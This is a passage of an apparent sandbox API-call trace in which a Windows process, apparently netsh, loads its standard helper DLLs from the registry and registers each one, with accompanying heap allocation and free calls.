lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="nshhttp", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.835] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0136.835] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0136.835] GetProcessHeap () returned 0x1cff6a50000 [0136.835] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1b8) returned 0x1cff6a7f810 [0136.835] GetProcessHeap () returned 0x1cff6a50000 [0136.835] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a83220 [0136.835] GetProcessHeap () returned 0x1cff6a50000 [0136.835] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a833e0 [0136.835] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0136.835] GetProcessHeap () returned 0x1cff6a50000 [0136.835] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a752c0) returned 1 [0136.835] LoadLibraryExW (lpLibFileName="NSHHTTP.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe62a60000 [0136.856] GetProcAddress (hModule=0x7ffe62a60000, lpProcName="InitHelperDll") returned 0x7ffe62a610e0 [0136.856] InitHelperDll () returned 0x0 [0136.856] RegisterHelper () returned 0x0 [0136.856] GetProcessHeap () returned 0x1cff6a50000 [0136.856] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x9a0) returned 0x1cff6a98980 [0136.856] GetProcessHeap () returned 0x1cff6a50000 [0136.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a98030) returned 1 [0136.856] RegEnumValueW (in: hKey=0xb4, dwIndex=0xa, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="nshipsec", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.857] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0136.857] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0136.857] GetProcessHeap () returned 0x1cff6a50000 [0136.857] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1e0) returned 0x1cff6a752c0 [0136.857] GetProcessHeap () returned 0x1cff6a50000 [0136.857] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x12) returned 0x1cff6a83180 [0136.857] GetProcessHeap () returned 0x1cff6a50000 [0136.857] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1a) returned 0x1cff6a86eb0 [0136.857] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0136.857] GetProcessHeap () returned 0x1cff6a50000 [0136.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a7f810) returned 1 [0136.857] LoadLibraryExW (lpLibFileName="NSHIPSEC.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe54840000 [0136.921] GetProcAddress (hModule=0x7ffe54840000, lpProcName="InitHelperDll") returned 0x7ffe54841250 [0136.921] InitHelperDll () returned 0x0 [0136.921] RegisterHelper () returned 0x0 [0136.921] GetProcessHeap () returned 0x1cff6a50000 [0136.921] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x9f8) returned 0x1cff6a9a340 [0136.921] GetProcessHeap () returned 0x1cff6a50000 [0136.921] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a98980) returned 1 [0136.921] RegisterHelper () returned 0x0 [0136.921] GetProcessHeap () returned 0x1cff6a50000 [0136.921] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xa50) returned 0x1cff6a9ad40 [0136.921] GetProcessHeap () returned 0x1cff6a50000 [0136.921] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9a340) returned 1 [0136.921] RegisterHelper () returned 0x0 [0136.921] GetProcessHeap () returned 0x1cff6a50000 [0136.921] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xaa8) returned 0x1cff6a98030 [0136.921] GetProcessHeap () returned 0x1cff6a50000 [0136.921] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ad40) returned 1 [0136.930] RegEnumValueW (in: hKey=0xb4, dwIndex=0xb, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="nshwfp", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.930] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0136.930] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0136.930] GetProcessHeap () returned 0x1cff6a50000 [0136.930] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x208) returned 0x1cff6a77b90 [0136.930] GetProcessHeap () returned 0x1cff6a50000 [0136.930] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xe) returned 0x1cff6a832a0 [0136.930] GetProcessHeap () returned 0x1cff6a50000 [0136.930] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x16) returned 0x1cff6a83340 [0136.930] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0136.930] GetProcessHeap () returned 0x1cff6a50000 [0136.930] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a752c0) returned 1 [0136.930] LoadLibraryExW (lpLibFileName="NSHWFP.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe54780000 [0136.958] GetProcAddress (hModule=0x7ffe54780000, lpProcName="InitHelperDll") returned 0x7ffe547810d0 [0136.958] InitHelperDll () returned 0x0 [0136.959] RegisterHelper () returned 0x0 [0136.959] GetProcessHeap () returned 0x1cff6a50000 [0136.959] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xb00) returned 0x1cff6a9b3a0 [0136.959] GetProcessHeap () returned 0x1cff6a50000 [0136.959] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a98030) returned 1 [0136.959] RegEnumValueW (in: hKey=0xb4, dwIndex=0xc, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="p2pnetsh", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.959] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0136.959] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0136.959] GetProcessHeap () returned 0x1cff6a50000 [0136.959] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x230) returned 0x1cff6a752c0 [0136.959] GetProcessHeap () returned 0x1cff6a50000 [0136.959] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x12) returned 0x1cff6a83020 [0136.960] GetProcessHeap () returned 0x1cff6a50000 [0136.960] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1a) returned 0x1cff6a81930 [0136.960] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0136.960] GetProcessHeap () returned 0x1cff6a50000 [0136.960] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a77b90) returned 1 [0136.960] LoadLibraryExW (lpLibFileName="P2PNETSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe54740000 [0137.006] GetProcAddress (hModule=0x7ffe54740000, lpProcName="InitHelperDll") returned 0x7ffe547411e0 [0137.006] InitHelperDll () returned 0x0 [0137.006] RegisterHelper () returned 0x0 [0137.006] GetProcessHeap () returned 0x1cff6a50000 [0137.006] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xb58) returned 0x1cff6a9dec0 [0137.006] GetProcessHeap () returned 0x1cff6a50000 [0137.006] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9b3a0) returned 1 [0137.006] RegisterHelper () returned 0x0 [0137.006] GetProcessHeap () returned 0x1cff6a50000 [0137.006] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xbb0) returned 0x1cff6a9ea20 [0137.006] GetProcessHeap () returned 0x1cff6a50000 [0137.006] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9dec0) returned 1 [0137.006] RegisterHelper () returned 0x0 [0137.006] GetProcessHeap () returned 0x1cff6a50000 [0137.006] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc08) returned 0x1cff6a9f5e0 [0137.006] GetProcessHeap () returned 0x1cff6a50000 [0137.006] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ea20) returned 1 [0137.007] RegisterHelper () returned 0x0 [0137.007] GetProcessHeap () returned 0x1cff6a50000 [0137.007] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc60) returned 0x1cff6aa01f0 [0137.007] GetProcessHeap () returned 0x1cff6a50000 [0137.007] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9f5e0) returned 1 [0137.012] RegisterHelper () returned 0x0 [0137.012] GetProcessHeap () returned 0x1cff6a50000 [0137.012] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xcb8) returned 0x1cff6a9dec0 [0137.012] GetProcessHeap () returned 0x1cff6a50000 [0137.012] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa01f0) returned 1 [0137.012] RegisterHelper () returned 0x0 [0137.012] GetProcessHeap () returned 0x1cff6a50000 [0137.012] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xd10) returned 0x1cff6a9eb80 [0137.012] GetProcessHeap () returned 0x1cff6a50000 [0137.012] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9dec0) returned 1 [0137.012] RegisterHelper () returned 0x0 [0137.012] GetProcessHeap () returned 0x1cff6a50000 [0137.012] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xd68) returned 0x1cff6a9f8a0 [0137.012] GetProcessHeap () returned 0x1cff6a50000 [0137.012] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9eb80) returned 1 [0137.014] RegisterHelper () returned 0x0 [0137.014] GetProcessHeap () returned 0x1cff6a50000 [0137.014] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xdc0) returned 0x1cff6a9dec0 [0137.014] GetProcessHeap () returned 0x1cff6a50000 [0137.014] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9f8a0) returned 1 [0137.014] RegEnumValueW (in: hKey=0xb4, dwIndex=0xd, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="rpc", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0137.014] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0137.014] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0137.014] GetProcessHeap () returned 0x1cff6a50000 [0137.014] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x258) returned 0x1cff6a9b3a0 [0137.015] GetProcessHeap () returned 0x1cff6a50000 [0137.015] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x8) returned 0x1cff6a5dc00 [0137.015] GetProcessHeap () returned 0x1cff6a50000 [0137.015] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x16) returned 0x1cff6a83360 [0137.015] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0137.015] GetProcessHeap () returned 0x1cff6a50000 [0137.015] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a752c0) returned 1 [0137.015] LoadLibraryExW (lpLibFileName="RPCNSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe5ff50000 [0137.022] GetProcAddress (hModule=0x7ffe5ff50000, lpProcName="InitHelperDll") returned 0x7ffe5ff51010 [0137.022] InitHelperDll () returned 0x0 [0137.022] RegisterHelper () returned 0x0 [0137.022] GetProcessHeap () returned 0x1cff6a50000 [0137.022] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xe18) returned 0x1cff6a9ec90 [0137.022] GetProcessHeap () returned 0x1cff6a50000 [0137.022] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9dec0) returned 1 [0137.022] RegisterHelper () returned 0x0 [0137.022] GetProcessHeap () returned 0x1cff6a50000 [0137.022] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xe70) returned 0x1cff6a9fab0 [0137.023] GetProcessHeap () returned 0x1cff6a50000 [0137.023] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ec90) returned 1 [0137.023] RegEnumValueW (in: hKey=0xb4, dwIndex=0xe, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="WcnNetsh", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0137.023] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxmontr.dll") returned 14 [0137.023] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxpromn.dll") returned 14 [0137.023] GetProcessHeap () returned 0x1cff6a50000 [0137.023] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x280) returned 0x1cff6aa0930 [0137.023] GetProcessHeap () returned 0x1cff6a50000 [0137.023] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x12) returned 0x1cff6a83780 [0137.023] GetProcessHeap () returned 0x1cff6a50000 [0137.023] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1a) returned 0x1cff6a819f0 [0137.023] _wcsupr (in: _String="WcnNetsh.dll" | out: _String="WCNNETSH.DLL") returned="WCNNETSH.DLL" [0137.023] GetProcessHeap () returned 0x1cff6a50000 [0137.023] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9b3a0) returned 1 [0137.023] LoadLibraryExW (lpLibFileName="WCNNETSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe5ed40000 [0137.035] GetProcAddress (hModule=0x7ffe5ed40000, lpProcName="InitHelperDll") returned 0x7ffe5ed41680 [0137.035] InitHelperDll () returned 0x0 [0137.035] RegisterHelper () returned 0x0 [0137.035] GetProcessHeap () returned 0x1cff6a50000 [0137.035] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xec8) returned 0x1cff6a9dec0 [0137.035] GetProcessHeap () returned 0x1cff6a50000 [0137.035] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9fab0) returned 1 [0137.035] RegEnumValueW (in: hKey=0xb4, dwIndex=0xf, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="whhelper", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0137.035] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0137.035] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0137.035] GetProcessHeap () returned 0x1cff6a50000 [0137.036] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x2a8) returned 0x1cff6a9b3a0 [0137.036] GetProcessHeap () returned 0x1cff6a50000 [0137.036] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x12) returned 0x1cff6a83480 [0137.036] GetProcessHeap () returned 0x1cff6a50000 [0137.036] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1a) returned 0x1cff6a81810 [0137.036] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0137.036] GetProcessHeap () returned 0x1cff6a50000 [0137.036] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa0930) returned 1 [0137.036] LoadLibraryExW (lpLibFileName="WHHELPER.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe5fb70000 [0137.075] GetProcAddress (hModule=0x7ffe5fb70000, lpProcName="InitHelperDll") returned 0x7ffe5fb714d0 [0137.075] InitHelperDll () returned 0x0 [0137.075] RegisterHelper () returned 0x0 [0137.075] GetProcessHeap () returned 0x1cff6a50000 [0137.075] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xf20) returned 0x1cff6a9ed90 [0137.075] GetProcessHeap () returned 0x1cff6a50000 [0137.075] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9dec0) returned 1 [0137.075] RegEnumValueW (in: hKey=0xb4, dwIndex=0x10, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="wlancfg", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0137.075] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0137.075] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0137.075] GetProcessHeap () returned 0x1cff6a50000 [0137.075] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x2d0) returned 0x1cff6a9b650 [0137.075] GetProcessHeap () returned 0x1cff6a50000 [0137.075] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a83520 [0137.075] GetProcessHeap () returned 0x1cff6a50000 [0137.075] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a83540 [0137.075] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0137.075] GetProcessHeap () returned 0x1cff6a50000 [0137.075] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9b3a0) returned 1 [0137.075] LoadLibraryExW (lpLibFileName="WLANCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe546b0000 [0137.134] GetProcAddress (hModule=0x7ffe546b0000, lpProcName="InitHelperDll") returned 0x7ffe546b1320 [0137.134] InitHelperDll () returned 0x0 [0137.134] RegisterHelper () returned 0x0 [0137.134] GetProcessHeap () returned 0x1cff6a50000 [0137.134] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xf78) returned 0x1cff6aa2fe0 [0137.134] GetProcessHeap () returned 0x1cff6a50000 [0137.134] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9ed90) returned 1 [0137.134] RegEnumValueW (in: hKey=0xb4, dwIndex=0x11, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="wshelper", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0137.134] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0137.134] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0137.134] GetProcessHeap () returned 0x1cff6a50000 [0137.134] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x2f8) returned 0x1cff6a9b930 [0137.134] GetProcessHeap () returned 0x1cff6a50000 [0137.134] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x12) returned 0x1cff6a83060 [0137.134] GetProcessHeap () returned 0x1cff6a50000 [0137.134] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1a) returned 0x1cff6a9e120 [0137.134] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0137.134] GetProcessHeap () returned 0x1cff6a50000 [0137.134] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9b650) returned 1 [0137.134] LoadLibraryExW (lpLibFileName="WSHELPER.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe5ea80000 [0137.219] GetProcAddress (hModule=0x7ffe5ea80000, lpProcName="InitHelperDll") returned 0x7ffe5ea81030 [0137.219] InitHelperDll () returned 0x0 [0137.219] RegisterHelper () returned 0x0 [0137.219] GetProcessHeap () returned 0x1cff6a50000 [0137.219] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xfd0) returned 0x1cff6a9e6d0 [0137.219] GetProcessHeap () returned 0x1cff6a50000 [0137.219] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa2fe0) returned 1 [0137.219] RegEnumValueW (in: hKey=0xb4, dwIndex=0x12, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="wwancfg", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0137.219] _wcsicmp (_String1="wwancfg.dll", _String2="ipxmontr.dll") returned 14 [0137.219] _wcsicmp (_String1="wwancfg.dll", _String2="ipxpromn.dll") returned 14 [0137.219] GetProcessHeap () returned 0x1cff6a50000 [0137.220] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x320) returned 0x1cff6a9b3a0 [0137.220] GetProcessHeap () returned 0x1cff6a50000 [0137.220] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a835c0 [0137.220] GetProcessHeap () returned 0x1cff6a50000 [0137.220] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a83600 [0137.220] _wcsupr (in: _String="wwancfg.dll" | out: _String="WWANCFG.DLL") returned="WWANCFG.DLL" [0137.220] GetProcessHeap () returned 0x1cff6a50000 [0137.220] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9b930) returned 1 [0137.220] LoadLibraryExW (lpLibFileName="WWANCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe5c720000 [0137.414] GetProcAddress (hModule=0x7ffe5c720000, lpProcName="InitHelperDll") returned 0x7ffe5c7211d0 [0137.414] InitHelperDll () returned 0x0 [0137.414] RegisterHelper () returned 0x0 [0137.414] GetProcessHeap () returned 0x1cff6a50000 [0137.414] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1028) returned 0x1cff6aa2fe0 [0137.414] GetProcessHeap () returned 0x1cff6a50000 [0137.414] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9e6d0) returned 1 [0137.414] RegEnumValueW (in: hKey=0xb4, dwIndex=0x13, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="peerdistsh", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0137.414] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0137.414] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0137.414] GetProcessHeap () returned 0x1cff6a50000 [0137.414] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x348) returned 0x1cff6a9bae0 [0137.414] GetProcessHeap () returned 0x1cff6a50000 [0137.414] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x16) returned 0x1cff6a9eca0 [0137.414] GetProcessHeap () returned 0x1cff6a50000 [0137.414] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1e) returned 0x1cff6a9dfa0 [0137.414] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0137.415] GetProcessHeap () returned 0x1cff6a50000 [0137.415] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9b3a0) returned 1 [0137.415] LoadLibraryExW (lpLibFileName="PEERDISTSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe544f0000 [0137.684] GetProcAddress (hModule=0x7ffe544f0000, lpProcName="InitHelperDll") returned 0x7ffe544f1220 [0137.684] InitHelperDll () returned 0x0 [0137.685] RegisterHelper () returned 0x0 [0137.685] GetProcessHeap () returned 0x1cff6a50000 [0137.685] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1080) returned 0x1cff6aa4010 [0137.685] GetProcessHeap () returned 0x1cff6a50000 [0137.685] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa2fe0) returned 1 [0137.685] RegisterHelper () returned 0x0 [0137.685] GetProcessHeap () returned 0x1cff6a50000 [0137.685] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10d8) returned 0x1cff6aa50a0 [0137.686] GetProcessHeap () returned 0x1cff6a50000 [0137.686] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa4010) returned 1 [0137.686] RegCloseKey (hKey=0xb4) returned 0x0 [0137.686] GetProcessHeap () returned 0x1cff6a50000 [0137.686] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a613c0) returned 1 [0137.686] GetProcessHeap () returned 0x1cff6a50000 [0137.686] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a58940) returned 1 [0137.687] GetProcessHeap () returned 0x1cff6a50000 [0137.687] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a99a80 [0137.687] GetProcessHeap () returned 0x1cff6a50000 [0137.687] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0137.688] RegisterContext () returned 0x0 [0137.688] GetProcessHeap () returned 0x1cff6a50000 [0137.688] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a9a180 [0137.688] GetProcessHeap () returned 0x1cff6a50000 [0137.688] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0137.688] RegisterContext () returned 0x0 [0137.692] _wcsicmp (_String1="ras", _String2="interface") returned 9 [0137.692] _wcsicmp (_String1="ras", _String2="interface") returned 9 [0137.692] GetProcessHeap () returned 0x1cff6a50000 [0137.692] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xe0) returned 0x1cff6aa0ad0 [0137.692] GetProcessHeap () returned 0x1cff6a50000 [0137.692] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9a180) returned 1 [0137.902] RegisterContext () returned 0x0 [0137.903] GetProcessHeap () returned 0x1cff6a50000 [0137.903] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a99980 [0137.903] GetProcessHeap () returned 0x1cff6a50000 [0137.903] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0137.903] RegisterContext () returned 0x0 [0137.904] 